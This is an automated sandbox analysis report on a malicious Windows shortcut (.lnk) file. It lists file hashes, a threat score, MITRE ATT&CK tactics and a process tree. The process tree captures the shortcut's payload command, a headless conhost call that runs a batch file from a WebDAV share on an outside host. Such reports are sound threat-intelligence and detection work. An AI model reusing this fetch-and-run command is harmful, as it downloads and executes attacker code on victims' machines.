c573cf0de7779f505f6a8d93fa8dcac5a4bbb4b691cbe1d710cab2e3513d9703

Analysis

max time kernel
120s
max time network
120s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
04-08-2024 01:50

Target

c573cf0de7779f505f6a8d93fa8dcac5a4bbb4b691cbe1d710cab2e3513d9703.lnk
Size

1KB
MD5

fcfe41cc55881aae3963605dfd103ae7
SHA1

edaa9a8e5c5a8dcbf2d511884d73a17d4e1c8b78
SHA256

c573cf0de7779f505f6a8d93fa8dcac5a4bbb4b691cbe1d710cab2e3513d9703
SHA512

91bcac1869133ea8d17339839f8ed3674a1c9e63dbc265aae22661c254ade6cbe854c6e2669faff63ed8759cdbbf244dc8e4ca541679cdd12304565991557075

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 600 wrote to memory of 2456	600	cmd.exe	conhost.exe
PID 600 wrote to memory of 2456	600	cmd.exe	conhost.exe
PID 600 wrote to memory of 2456	600	cmd.exe	conhost.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\c573cf0de7779f505f6a8d93fa8dcac5a4bbb4b691cbe1d710cab2e3513d9703.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:600

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" --headless \\burrkeklprinting.tech@5378\DavWWWRoot\new.bat
2⤵
PID:2456

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact